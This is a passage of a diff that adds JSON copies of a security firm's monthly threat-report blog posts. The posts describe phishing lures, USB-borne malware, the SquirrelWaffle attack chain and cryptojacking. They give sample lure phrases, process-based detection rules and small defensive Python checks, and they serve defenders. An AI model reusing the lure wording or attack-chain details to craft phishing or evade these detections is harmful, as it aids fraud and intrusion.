Phishing email soliciting cryptocurrency donations (note that the sender\u2019s email address doesn\u2019t align with the name, organization, or email provided in the email signature) Here are a few phrases we\u2019ve seen in phishing emails referencing Ukraine to target cryptocurrency: Email subject: \u201cHelp \u2013 Bitcoin\u201d \u201cPayment from your account\u201d \u201cHelp save children in ukraine\u201d \u201cCrypto \u2013 Account\u201d \u201cUkraine Donations\u201d Email body: \u201cHere is my BTC wallet\u201d \u201ctransfer bitcoins\u201d \u201cThis is my bitcoin id\u201d \u201cNow accepting cryptocurrency donation\u201d \u201cbelow is our wallet ID\u201d Given threat actors\u2019 horrible appropriation of this conflict for malicious means and personal gain, those looking to provide financial support to victims of the invasion of Ukraine should confirm the legitimacy of any donation-related communications before providing financial information. For example, recipients should inspect the sender\u2019s email address, search the organization online to confirm key contact details, and hover over any buttons/URLs in the email to inspect the redirect path without clicking it. Phishing resilience recommendations: Conduct regular security awareness training for employees, including phishing simulations. Don\u2019t click any links in a suspicious email. Double check the sender\u2019s address and return path in suspicious emails. Use open source tools to verify details for external senders and organizations. Use a verified internal channel (for example, an email to a verified third-party vendor or a message on your company\u2019s internal messaging platform) to confirm if the communication/request in a suspicious email is legitimate and expected. Block access to malicious websites. Remove the email from a user\u2019s inbox if it\u2019s determined to be a phishing attempt. Takeaways In February 2022, we observed several threat vectors and tactics discussed in our previous reports making a strong reappearance, including: Removable media Use of valid credentials for cloud identity providers Public-facing exploitation of Log4j Cryptojacking Phishing with credential harvesters An important step to protect against many of the above: deploy phish-resistant MFA (FIDO security keys) everywhere you can. This is particularly important to make sure threat actors don\u2019t gain access to your SSO tools and all of the sensitive apps and data they provide access to. While only involved in one incident we investigated in February, it was telling to see the Log4j vulnerability continuing to be exploited against public-facing systems. This vulnerability will remain relevant and should be examined during any vulnerability scans conducted in and against your digital environment. In terms of malware, AsyncRAT made up 15 percent of identified malware payloads from incidents we detected and responded to in February 2022. This open source remote administration tool was initially deployed using an ISO file and used a number of stages to eventually inject its final payload into the memory of a legitimate process. And let\u2019s not forget: removable media remained an important attack vector in February and threat actors continued to use unauthorized system access to deploy crypto mining software. The takeaway: attackers will return to the vectors and tactics they know work, even as new ones emerge. Phishing remained in the top spot for infection vectors in February. 
Two key trends stood out: first, threat actors using the ability to register an adobe.com subdomain through Adobe Campaign to give their emails a sense of legitimacy. Attackers hope the association with adobe.com will make their victims more likely to click links in the email and follow through on downloading malicious files or entering credentials. Users should check sender addresses and URL pathways (without clicking) and check with colleagues through verified channels if they\u2019re expecting to collaborate on Adobe-based projects. When in doubt, it\u2019s always better to forward potential phishing emails to your security team for investigation. The other phishing trend we observed involved cryptocurrency \u2014 specifically, threat actors requesting crypto transfers by pretending to solicit donations related to the war in Ukraine. While Ukraine has legitimately raised $35 million in cryptocurrency donations , threat actors are trying to take advantage of the crisis for personal financial gain. The verified crypto wallet addresses for donations to Ukraine can be found on the country\u2019s official Twitter account . Details for other organizations should be confirmed through verified external sources before any financial information is provided. We\u2019ll be back with more attack vectors insights and threat data \u2014 but we\u2019re changing things up! Our threat reports are going quarterly so we can provide more data on what we\u2019re seeing, highlight detection opportunities, and dive further into resilience recommendations that can protect your org. Expect to see our first quarterly threat report in May. If you read our Great eXpeltations annual report , that\u2019s a hint of what\u2019s coming your way! In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note , we\u2019re happy to chat." +} \ No newline at end of file diff --git a/top-attack-vectors-january-2022.json b/top-attack-vectors-january-2022.json new file mode 100644 index 0000000000000000000000000000000000000000..afeaf22a7b74857441c4abc1a3df303f4631cb9e --- /dev/null +++ b/top-attack-vectors-january-2022.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: January 2022", + "url": "https://expel.com/blog/top-attack-vectors-january-2022/", + "date": "Feb 17, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: January 2022 Security operations \u00b7 6 MIN READ \u00b7 BRITTON MANAHAN, SIMON WONG AND HIRANYA MIR \u00b7 FEB 17, 2022 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our security operations center (SOC). Our goal is to translate the security events we\u2019re detecting into a security strategy for your org. For this report, our SOC analyzed the incidents we investigated in January 2022 to determine the top attack vectors used by threat actors. Here\u2019s what stood out this month: USB flash drives continuing to pose a malware threat Threat actors taking advantage of the wide range of malware at their disposal Phishing attempts using fake antivirus invoices and CEO impersonation Keep reading for details and our tips for what to do about all the above. 
Removable media remains a threat TL;DR: Removable media, in particular USB-based storage devices, are still a relevant threat to your environment. In January 2022, removable media were responsible for nine percent of all incidents we responded to. That increases to 20 percent for incidents where the initial infection vector involved a physical endpoint (in other words, removing incidents involving a cloud-based service). While security awareness training has focused on USB devices for years and some orgs require approval per-device before connecting them to a company-owned asset, these devices continue to be used in business environments because of their convenience. And usage doesn\u2019t just apply to known and trusted USB devices. In fact, a 2016 study examining what people would do if they found a USB in a parking lot showed that nearly 50 percent of people would plug an unknown USB device into their computer. While human curiosity and impulse is likely just as high in 2022, maybe we can hope the rise of remote work has made the discovery of office parking lot USBs less likely? With that said, even trusted USB devices are often infected with malware variants that search for external storage devices connected to a victim host to infect them and spread further. This risk is much greater for endpoint users who can transfer USB devices from personal devices to business assets. In January 2022 alone, we saw the AsyncRat, Valyrian, Gamarue, Agent Tesla, and Forbix malware families attempt to spread through USB storage devices. We also saw additional generic malicious worms including one deployed as a hidden VBScript script file on the device. It\u2019s highly likely that these malware variants would have tried to infect any other external USB storage devices attached to these systems had they achieved their initial infection without detection. Resilience recommendations: Consider blocking external USB storage devices by default in your environment, with approval required for use. Make sure your security awareness training includes sections on the dangers of external USB storage devices. If supported, have your antivirus software or endpoint detection and response (EDR) tech scan any externally-connected USB storage devices. If possible, disable the AutoRun feature for USB flash drives in Windows-based operating systems. The AutoRun feature allows staged malware on USB devices to execute without additional interaction as soon as the device is plugged in. A variety of variants TL;DR: Threat actors are deploying a wide range of malware variants, frequently with the common goal of achieving remote system access. In January 2022, no single malware variant dominated the landscape of identified payloads among incidents we responded to. Here\u2019s a list of malware variants we identified, with no variant making up more than 15 percent of the total: Agent Tesla AsyncRAT ChromeLoader Conflicker CryptoWall Forbix Gamarue Gootkit Gozi Socgholish Valyrian In addition to these malware families, we also observed: A generic VBScript and PowerShell-based script used for command and control that we weren\u2019t able to attribute to a particular malware family. A legitimate crypto miner deployed for cryptojacking. Legitimate remote access software deployed for remote interactive desktop access. Two instances of a malicious Chrome extension (ChromeLoader) being installed. A ransomware sample. 
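With that many families in play, quick identification matters more than deep reversing. One rough option is matching a sample\u2019s SHA-256 against abuse.ch\u2019s free MalwareBazaar database. The sketch below uses a placeholder hash, and the request and response fields reflect our general understanding of that API rather than anything specific to these incidents:

import requests  # pip install requests

def lookup_family(sha256):
    # Ask MalwareBazaar whether the hash is known and, if so, which family it is tagged as.
    response = requests.post('https://mb-api.abuse.ch/api/v1/',
                             data={'query': 'get_info', 'hash': sha256}, timeout=10)
    payload = response.json()
    if payload.get('query_status') != 'ok':
        return None  # unknown hash (or API change); fall back to other OSINT sources
    return payload['data'][0].get('signature')

print(lookup_family('0' * 64))  # placeholder hash; substitute the sample you are triaging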
This wide variety of malware and payloads demonstrates the abundance of malicious software and tooling at threat actors\u2019 disposal. The continual economic incentives of cybercrime guarantee that malware families and their variants will continue to evolve. Most of the malware samples listed above established a connection to a remote command and control (C2) channel, though they took different obfuscated paths and stages to reach that point in their execution. Regarding initial infection vectors, we also observed a variety of techniques to deploy these malware variants, including: Removable media Web delivery JavaScript file Phishing Macro-enabled Microsoft Office doc To sum it up: the info in this section shows that defenders need to make sure they don\u2019t hyperfocus on any particular malware variant or specific tool or technique used by threat actors, but rather focus on a layered approach to security that can detect and prevent threats across a varied and continually evolving malware landscape. Regarding identification of samples you may encounter, open source intelligence (OSINT) tools for malware are a great way to identify a malware family without needing a full-time malware reverse engineer on your staff. Resilience recommendations: Confirm your endpoint detection and response (EDR) coverage across all of your endpoints. Implement layered security controls across your environment to detect and prevent evolving threats. Perform a penetration test against your environment to evaluate your current security posture. Subscribe to OSINT feeds to stay up-to-date on malware trends and leverage this intelligence in your deployed security tech. Phishing TL;DR: We saw an increase in fake Norton invoices and CEO impersonation emails in January 2022. We reviewed over five thousand potentially malicious email submissions in January 2022, and identified two phishing trends using the following techniques: Fake Norton invoices We noticed an increase in the number of emails containing bogus Norton invoices for Norton Antivirus software purchases. The invoices generally include a phone number to call if you have questions about your recent transaction. These emails usually come from spoofed sender addresses that appear as if they\u2019re from Norton Security or other legitimate businesses that sell Norton Security products, like GeekSquad. We\u2019ve also seen threat actors use the QuickBooks platform to give the email legitimacy. Threat actors aim to persuade recipients to call the phone number provided, then plan to scam victims out of money by requesting a payment method for the invoiced amount. They also may try to make recipients install third-party remote tools that grant access to their computers. Fake Norton invoice using QuickBooks platform CEO impersonation Because info about CEOs is usually widely available online, CEO impersonation is a common occurrence and effective tactic for attackers. Most CEO impersonation email submissions convey a sense of urgency in the email\u2019s body and subject.
Here are a few phrases that we\u2019ve come across: Email subject: \u201cURGENT\u201d \u201cConfidential\u201d \u201cavailable ?\u201d \u201cQuick Response\u201d Email body: \u201cDo you have some spare time to handle a quick task?\u201d \u201cEmail me on here once you get this\u201d \u201cI need a task done ASAP and look forward to my text\u201d \u201cYour immediate response will be highly appreciated\u201d Impersonation emails also tend to spoof an external account to make it seem like the email is coming from the organization\u2019s CEO. Attackers then often like to move the conversation away from email to lower the chance of being discovered. Asking for cell phone numbers allows them to use calls or texting for further interactions. Threat actors will usually ask victims to purchase gift cards and send pictures of the redemption codes. Resilience recommendations Conduct regular security awareness training for employees, including phishing simulations. Don\u2019t click on any links in a potentially suspicious email. Double check the sender\u2019s address and return path for suspicious emails. Use open source tools to verify if a provided phone number is actually associated with the supposed sender. Block access to malicious websites. Use a verified internal channel (for example, a phone call to a verified company phone number or a message on your company\u2019s internal messaging platform) to confirm if the communication/request in the email is legitimate and expected. Remove the email from a user\u2019s inbox if it\u2019s determined to be a phishing attempt. Takeaways Phishing remained in the top spot for infection vectors in January, but we also saw a wide variety of malware and an old friend \u2013 the USB flash drive threat \u2013 make a return. While many of us may assume the days of bumping into a random flash drive in the office parking lot are over, these devices remain a target for threat actors. It\u2019s important to remember that USB devices allow threat actors to use a variety of malware families to gain access to additional systems. Many malware variants can continually search an infected system for connected external USB storage devices and infect them, as well. Companies should have security controls in place to block endpoint users from inserting USB flash drives previously connected to personal assets into company assets, and only allow approved storage devices for company assets. Speaking of malware, we also saw a range of malware families this month, identifying 11 families across payloads for incidents we responded to. And no single family made up more than 15 percent of the total number of malware samples. We also identified a malicious Chrome browser extension and artifacts from a ransomware sample. With such a variety of tools at their disposal, attackers are clearly deploying a variety of tactics to achieve their goals. While these malware families used different obfuscation and payload stages, the most common end goal was establishing a command and control network communication channel back to the attacker. Companies should make sure that they have complete coverage of their endpoint security controls across all of their devices, and consider subscribing to OSINT malware feeds. Phishing remains as effective of a tactic as ever, with two particularly notable trends in January. Threat actors are sending convincing Norton Antivirus invoices to trick users into paying them. 
This social engineering scheme continues over the phone after users who received the email call the number provided, when threat actors will typically request payment information. Threat actors are also sending fake emails appearing to come from a company\u2019s CEO. These emails rely on urgency to hopefully prevent targeted employees from taking the time to verify features of the email that would point out it isn\u2019t legit. It\u2019s essential to regularly conduct security awareness training for employees to help them identify indicators of a phishing attempt. We\u2019ll be back with insights on February\u2019s top attack vectors. In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note ." +} \ No newline at end of file diff --git a/top-attack-vectors-july-2021.json b/top-attack-vectors-july-2021.json new file mode 100644 index 0000000000000000000000000000000000000000..1384e53263b6a41e14fbd47f37f038f52ebd8423 --- /dev/null +++ b/top-attack-vectors-july-2021.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: July 2021", + "url": "https://expel.com/blog/top-attack-vectors-july-2021/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: July 2021 Security operations \u00b7 5 MIN READ \u00b7 JON HENCINSKI \u00b7 AUG 13, 2021 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our Security Operations Center (SOC). Our goal is to translate the security events we\u2019re detecting into security strategy for your org. For this report, our SOC analyzed the incidents we investigated in July 2021 to determine the top attack vectors used by bad actors that month. We\u2019ll dive into the trends we\u2019re seeing in two important arenas: phishing and malware. Phishing Business Email Compromise (BEC) in O365 is still public enemy number one. TL;DR: BEC attempts in Microsoft Office 365 (O365) launched from phishing emails were the top threat in July. Follow @jhencinski Nearly 65 percent of incidents we identified were BEC attempts in O365 \u2013 up slightly from June, when BEC attempts in O365 accounted for 53 percent of incidents we identified. Threat actors behind these campaigns create phishing emails with links to credential harvesting sites impersonating webmail login portals. After the victim enters their credentials, the threat actor can use these credentials to access the victim\u2019s email \u2014 potentially opening a treasure trove of sensitive information. Of note, we didn\u2019t identify a BEC attempt in Google Workspace in July. While Google\u2019s Workspace security settings are pretty straightforward and proficient out-of-the-box, O365 has some initial configurations that must be changed by default to improve security (listed below), otherwise leaving opportunities in play for bad actors. We expect the trend of O365 BEC attempts to continue and we\u2019re monitoring Microsoft\u2019s plan to do away with Basic Authentication by the end of 2021. 
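Before working through the recommendations below, it helps to know how much legacy authentication your tenant still sees. Here is a minimal sketch that tallies legacy-protocol sign-ins from a JSON export of Azure AD sign-in logs; the clientAppUsed field name is an assumption based on the standard sign-in log export, so adjust it if your export differs:

import json
from collections import Counter

LEGACY_CLIENTS = {'IMAP4', 'POP3', 'Authenticated SMTP', 'Exchange ActiveSync', 'Other clients'}

def tally_legacy_signins(export_path):
    # Count sign-ins that arrived over legacy protocols, which bypass modern auth controls.
    with open(export_path) as handle:
        events = json.load(handle)
    return Counter(event.get('clientAppUsed') for event in events
                   if event.get('clientAppUsed') in LEGACY_CLIENTS)

print(tally_legacy_signins('signin_logs.json'))  # placeholder export path

If the counts are already near zero, disabling the legacy protocols outright becomes a much easier conversation.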
Resilience recommendations: Ensure that you\u2019re enabling MFA wherever possible Disable legacy protocols like IMAP and POP3 Implement extra layers of conditional access for your riskier user base and high-risk applications Consider Azure Identity Protection or Microsoft Cloud App Security (MCAS) BEC isn\u2019t just about access to email. Protect your cloud identity providers too! We\u2019re seeing an increase in the number of attacks targeting cloud access identity providers this year. By attacking these providers, threat actors gain access to SSO credentials and, through them, application data. Nearly 100 percent of the attacks on cloud identity providers we identified in July targeted Okta credentials , a popular SSO technology. Resilience recommendations: Phish resistant MFA (fido/webauthn) Enforce MFA prompts when users connect to sensitive apps via app-level MFA Customize your Okta sign-in page appearances Watch out for voice-phishing, aka \u201cvishing\u201d, attacks. In July, our SOC responded to a remote access scam incident where an employee received a phone call from a scammer pretending to be from the org\u2019s help desk. The employee was instructed to download and install software that allowed the scammer to access and remotely control the employee\u2019s desktop computer. At this point, the employee sensed something was amiss, hung up the phone and contacted their security team directly (good call!). We typically spot these attacks by monitoring for the installation of remote access software that\u2019s atypical for an org. In these scenarios, the scammer is after credit card information. They typically have the victim deploy legitimate remote access software, then take control of the victim\u2019s computer and give the appearance that their machine is \u201cinfected\u201d with \u201cviruses.\u201d At that point, they ask for the victim\u2019s credit card information to \u201cclean up\u201d and repair their machine. Microsoft recently posted a blog describing a recent ransomware attack that used vishing to gain initial entry. Resilience recommendations: Block installation of remote access software that\u2019s not approved using A/V or EDR. Be suspicious of any phone calls received directly from someone claiming to be from your IT Help Desk. It\u2019s totally okay to call them back to verify if it\u2019s legitimate, but make sure to use the help desk numbers provided by your company and not the caller. If you notice something suspicious, contact your IT Help Desk or security team. Malware Bad actors continue to favor user execution > exploitation TL;DR: You\u2019re far more likely to experience an incident from an employee unintentionally self-installing malware or running an evil macro than from an unpatched vulnerability. Deployment of widely distributed commodity malware on Windows-based computers accounted for 17 percent of incidents that we responded to in July. Commodity malware includes \u201cdroppers,\u201d programs to steal employee information, coin miners and banking Trojans. Only one opportunistic malware incident in July was the result of a software vulnerability. The rest? Techniques that required user execution. Examples: Zipped JScript files, Zipped Windows Executables and Microsoft macro-enabled Word documents. These aren\u2019t exploits. This is \u201cfeature\u201d abuse. While we certainly recommend staying up-to-date with the latest OS and software updates, orgs need to evaluate and control the \u201cdouble click\u201d attack surface. 
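To put a number on that \u201cdouble click\u201d attack surface, a simple starting point is looking at what actually arrives inside zipped attachments. Here is a minimal sketch: the extension list is illustrative rather than exhaustive, the file name is a placeholder, and password-protected archives will not open here and deserve their own policy:

import zipfile
from pathlib import Path

# Illustrative list of extensions that rely on a user double-click to do damage.
RISKY_EXTENSIONS = {'.js', '.jse', '.vbs', '.wsf', '.hta', '.exe', '.scr', '.dll', '.docm', '.xlsm'}

def risky_members(zip_path):
    # Return archive members a gateway or analyst might want to quarantine or review.
    with zipfile.ZipFile(zip_path) as archive:
        return [name for name in archive.namelist()
                if Path(name).suffix.lower() in RISKY_EXTENSIONS]

print(risky_members('suspicious_attachment.zip'))  # placeholder attachment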
It\u2019s worth noting that we didn\u2019t identify an incident where malware was deployed to a Google Chromebook or macOS-based computer in July. All of the commodity malware incidents we identified in July involved a Windows-based computer. We fully expect the trend of threat actors favoring user execution over exploitation to continue. Resilience recommendations: We know disabling Office macros isn\u2019t easy, but it\u2019s worth exploring given their tendency to be exploited Consider associating WSH files with Notepad to mitigate common remote code execution techniques Disable Excel 4.0 macros WordPress security and its ecosystem have improved over the years, but it\u2019s still an attack vector. In July, our SOC stopped a ransomware attack at a large software and staffing company. The attackers compromised the company\u2019s WordPress CMS and used the SocGholish framework to trigger a drive-by download of a Remote Access Tool (RAT) disguised as a Google Chrome update. In total, four hosts downloaded a malicious Zipped JScript file that was configured to deploy a RAT, but we stopped the attack before ransomware deployment and helped the organization remediate its WordPress CMS. Keep up to date on patches, but also consider the resilience recommendations below. Resilience recommendations: Run trusted and well-known WordPress plugins Follow a WordPress hardening guide or install a WordPress security plug-in Explore implementing or updating your website Content Security Policy to block malicious scripts MFA everything and all users Lock down your dev and staging instances, too (including adding MFA) Run an IR tabletop exercise where the initial entry point is your WordPress site Takeaways The wave of ransomware news this summer and the growing trend of bad actors deploying malware using techniques that require user execution highlights the need for orgs to guard themselves against future ransomware incidents (see our recommendations here ). That being said, phishing (and particularly BEC through O365) was by far the most frequent threat we investigated in July, and we expect it to remain that way. Preventing BEC and credential harvesting through phishing and \u201cvishing\u201d should be a priority for resilience efforts. Orgs should stay up-to-date on the latest phishing trends to update their policies and educate their employees when new tactics are at play. And our top recommendation to protect against BEC in O365 and account takeover? MFA, MFA, MFA. Then consider taking some of the additional resilience actions we\u2019ve discussed, like disabling legacy protocols, adding extra layers of conditional access and deploying additional security tools like Azure Identity Protection and MCAS. We\u2019ll be back with insights on August\u2019s top attack vectors. In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note ." 
+} \ No newline at end of file diff --git a/top-attack-vectors-november-2021.json b/top-attack-vectors-november-2021.json new file mode 100644 index 0000000000000000000000000000000000000000..5300fa2d01acfee0b52c67ee19ea0ff490075e1f --- /dev/null +++ b/top-attack-vectors-november-2021.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: November 2021", + "url": "https://expel.com/blog/top-attack-vectors-november-2021/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: November 2021 Security operations \u00b7 7 MIN READ \u00b7 KYLE PELLETT \u00b7 DEC 14, 2021 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our Security Operations Center (SOC). Our goal is to translate the security events we\u2019re detecting into a security strategy for your org. For this report, our SOC analyzed the incidents we investigated in November 2021 to determine the top attack vectors used by bad actors. Here\u2019s what\u2019s ahead: A rise in phishing emails linking to malicious macro-enabled Microsoft Office docs, ultimately targeting financial accounts A breakdown of cryptojacking and the latest tactics we\u2019re seeing What to do about all the above Evil macros used to deploy SquirrelWaffle TL;DR: 25 percent of the commodity malware incidents we investigated in November were attempts to deploy SquirrelWaffle. In November, we observed a 10 percent increase in commodity malware incidents resulting from phishing emails containing links to download malicious macro-enabled Microsoft Office or Excel documents. We attributed most of this activity to SquirrelWaffle, a malware loader. One in four commodity malware incidents were attempts to deploy this family of malware. This is a substantial increase from previous months and we expect this trend to continue. A typical attack chain to deploy SquirrelWaffle looks like the following: An employee receives a phishing email containing a seemingly innocuous link and an urgent call to action If the employee clicks the link, they receive a ZIP file with an embedded macro-enabled Office or Excel document The document instructs the employee to enable macros (red flag!) If the employee enables macros, this initiates the SquirrelWaffle infection process SquirrelWaffle is then typically used to deploy additional malware to an infected host To date, we\u2019ve seen that SquirrelWaffle often downloads a variant of the Qakbot banking trojan to scrape the victim\u2019s machine for sensitive financial data and send it back to the attackers. SquirrelWaffle can also load more insidious malware like CobaltStrike\u2019s Beacon agent, a post-exploitation attack emulation tool that\u2019s popular among cybercrime and ransomware groups. Notable: We integrate with many Endpoint Detection and Response (EDR) technologies and have identified a trend where SquirrelWaffle executes at least partially, regardless of the EDR in use. Here\u2019s an example. In a recent investigation involving a Windows 10 host with an EDR agent, an employee downloaded a malicious ZIP file with an embedded Office document and then enabled macros. This kicked off the SquirrelWaffle infection process. The evil macro was configured to download and execute evil Windows DLL files on the infected host. 
Shortly after, we detected process activity on the infected host consistent with reconnaissance. At this point in the attack, the EDR agent terminated the evil process. Here\u2019s what that looks like from a defender\u2019s perspective: Endgame process tree view of SquirrelWaffle resulting in second stage payload execution. What\u2019s the goal here? In most cases, the goal is to scrape the infected host for credentials, including financial account information. When a host is infected, attackers gain access to that victim\u2019s contact list and can use their compromised accounts to play on trust between the account owner and their contacts to enable further infections. How to detect SquirrelWaffle: Alert when you see an Excel process spawn Regsvr32.exe to load DLL files in C:Datop For a broader approach, alert when you see an Excel process spawn Regsvr32.exe Alert when you see Regsvr32.exe execute with references to .good or .text files within the process arguments Alert when you see Microsoft Remote Assistance (msra.exe) spawn process typically associated with recon (whoami.exe, arp.exe) and its parent process is Regsvr32.exe Here\u2019s an example of a SquirrelWaffle alert in the Expel Workbench\u2122: Expel Workbench\u2122 process tree lineage of SquirrelWaffle: Outlook -> Excel -> Regsvr32 Resilience recommendations: Block Microsoft Office macros and Excel 4.0 macros as they\u2019re a popular target to exploit with malware. While macros may offer some productivity improvements, if you can live without them, it\u2019s best to disable them entirely. We know it\u2019s a tall order, but spend time educating your users on how to spot phishing emails and suspicious links or attachments. Various exploits used to deploy coin miners TL;DR: Routes of infection vary, but attackers\u2019 end goal remains the same: deploying crypto mining software. We\u2019ve now brought up cryptojacking in a few of these reports. So you may be asking yourself, \u201cwhat is cryptojacking and why should I care?\u201d That\u2019s a totally fair question. The quick answer is that attackers want to use other people\u2019s computing resources to do computational work to earn cryptocurrency and profit. Crypto mining generally isn\u2019t profitable when you factor in operational costs \u2013 it requires tons of energy and resources to earn cryptocurrency this way. But if attackers can cut costs by using other people\u2019s resources (electricity, internet and primarily processing power), it can become profitable. Consider this metaphor \u2013 you\u2019re a hard working gold panner in your local creek. You\u2019ve been panning for gold for a year now and some days you\u2019re able to find a nugget and pay your bills for the month, but on average, you don\u2019t break even. In fact, you\u2019re losing money gambling on your luck, which is also dependent on how many hours you put into the actual work of wading into the water and sifting through rocks and sand. But what if you could convince your neighbors to also spend their days panning for gold in their creeks and send you the nuggets? Your problem would be solved! Except that no one would actually do that since there\u2019s nothing in it for them. Which is what cryptojacking boils down to \u2013 taking advantage of other people\u2019s resources without their permission so you profit. So how does this happen in a digital world? Primarily by taking advantage of vulnerable servers on cloud infrastructure. 
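A quick self-check on that cloud-infrastructure front is making sure none of your S3 buckets are unintentionally open to the world. Here is a minimal sketch using boto3; it assumes AWS credentials are already configured and it only inspects the public access block settings, which is just one piece of the S3 access-control picture:

import boto3  # pip install boto3; assumes AWS credentials are already configured
from botocore.exceptions import ClientError

s3 = boto3.client('s3')

for bucket in s3.list_buckets()['Buckets']:
    name = bucket['Name']
    try:
        config = s3.get_public_access_block(Bucket=name)['PublicAccessBlockConfiguration']
        if not all(config.values()):
            # At least one of the four public access controls is switched off
            print(name, 'has a public access setting disabled')
    except ClientError:
        # No public access block configured at all; worth a closer look
        print(name, 'has no public access block configuration')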
We\u2019re typically alerted to a cryptojacking operation by an alert for network traffic patterns that we know resemble crypto mining. We\u2019ll see lots of outbound traffic to a miner pool, which is essentially the digital river from our metaphor where people send their cryptographic hashes and try to get a reward. Our investigations typically lead us back to an exploited vulnerability on a public-facing web server. Here are some of the specific tactics we\u2019ve seen recently: Public Amazon S3 buckets are a necessary storage option used regularly by AWS cloud customers. This also makes them a popular target for attackers. Bad actors scan the contents of these buckets for valuable access keys and other identifiable information that shouldn\u2019t be public. These data leaks can occur if proper S3 bucket access controls aren\u2019t implemented. In one instance, attackers gained access to AWS through credentials that were mistakenly made publicly available. The first thing the attackers did was run new EC2 instances (virtual servers hosted on AWS) in our customer\u2019s AWS environment and begin crypto mining. Notably, they didn\u2019t attempt any other exploitation \u2013 we suspect they didn\u2019t want to set off alarms, so took the shortest path to begin crypto mining as quietly as possible. Going unnoticed while their operations run is the ideal scenario for cryptojacking attackers. So what coin miners do we typically see? A lot of XMRig to mine Monero. But on rare occasions, we see a coin miner deployed alongside advanced malware that not only mines coins but also steals access keys and spreads within an organization\u2019s cloud environment. In November, we observed the crypto mining TNT Worm (which is also able to steal AWS access keys) on a customer\u2019s demo EC2 instance within minutes of being turned on. We suspect this EC2 instance was compromised because it hadn\u2019t been regularly updated since it was for demo purposes and wasn\u2019t frequently active. This worm has remained prevalent, consistently taking advantage of misconfigured systems. The worm also has an interesting greedy characteristic \u2013 it attempts to identify if there are any other miners running on the infected hosts and disables any that are to ensure processing power and mining capabilities are dedicated to its mining operation. The TNT Worm is configured to spread itself by scanning for additional misconfigured Docker platforms and Kubernetes systems. In this incident, we identified the worm and provided remediation steps to our customer in seven minutes after evidence of crypto mining was identified. Our investigation didn\u2019t find evidence of AWS access key exposure. We suspect the TNT Worm prioritizes getting mining operations up and running before downloading additional scripts that attempt to propagate in the environment through AWS access keys. With regard to another crypto jacking infection pathway, this month also showed us that poisoning npm packages wasn\u2019t a one hit wonder. Last month , we discussed hijacked ua-parser and rc packages used to deploy crypto mining software. This month, we saw the popular coa package causing trouble for a few of our customers. Resilience recommendations: Regularly check and update outdated software on public-facing servers and maintain a consistent update regimen to keep up with newly discovered vulnerabilities. Follow security news and subscribe to threat intelligence feeds about current and past exploits to stay up-to-date on the latest targets. 
Implement network layer controls to detect and block network communications to cryptocurrency mining pools. Have computing resource alarms forwarded to your SIEM to alert your team of overtaxed resources deployed for cryptojacking. Implement access controls for Amazon S3 buckets. Scan and identify public-facing assets using Shodan . Confirm your endpoint detection and response (EDR) coverage across all of your endpoints. Takeaways One of the most notable trends our team detected this month was a 10 percent increase in commodity malware incidents resulting from phishing emails containing links to download malicious macro-enabled Microsoft Office and Excel documents \u2013 in most cases, SquirrelWaffle. If not detected and stopped, SquirrelWaffle typically downloads a banking trojan onto victims\u2019 machines to compromise their financial accounts. Our top tip to combat this trend: disable Microsoft Office macros and Excel 4.0 macros since they\u2019re such a popular target to exploit with malware. Then, spend time educating your users on how to spot and report phishing emails and suspicious links or attachments so they\u2019re less inclined to click when that malicious scam comes through. And in case a user does fall for the phishing campaign, deploying SquirrelWaffle into your environment, consider the detection opportunities discussed above to catch it in its tracks. Another key trend we\u2019ve mentioned before is that malicious cryptocurrency activity is on the rise this year. Attackers are using different methods of infection, but share the same end goal \u2013 cryptojacking, or using their victims\u2019 computing resources to run crypto mining software. To keep miners out of your environment, make sure to keep your software up-to-date on public-facing servers and keep an eye out for newly discovered vulnerabilities. Also make sure to follow proper endpoint guidance, including EDR and patching. Additionally, tools that alert your operations team of overtaxed resources can also help your security team by indicating resources deployed for cryptojacking. We\u2019ll be back with insights on December\u2019s top attack vectors. In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note ." +} \ No newline at end of file diff --git a/top-attack-vectors-october-2021.json b/top-attack-vectors-october-2021.json new file mode 100644 index 0000000000000000000000000000000000000000..33274a55c710497ff8ea56a4f4429779159e4fc2 --- /dev/null +++ b/top-attack-vectors-october-2021.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: October 2021", + "url": "https://expel.com/blog/top-attack-vectors-october-2021/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: October 2021 Security operations \u00b7 6 MIN READ \u00b7 BRITTON MANAHAN \u00b7 NOV 10, 2021 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends and resilience recommendations identified by our Security Operations Center (SOC). Our goal is to translate the security events we\u2019re detecting into a security strategy for your org. For this report, our SOC analyzed the incidents we investigated in October 2021 to determine the top attack vectors used by bad actors. 
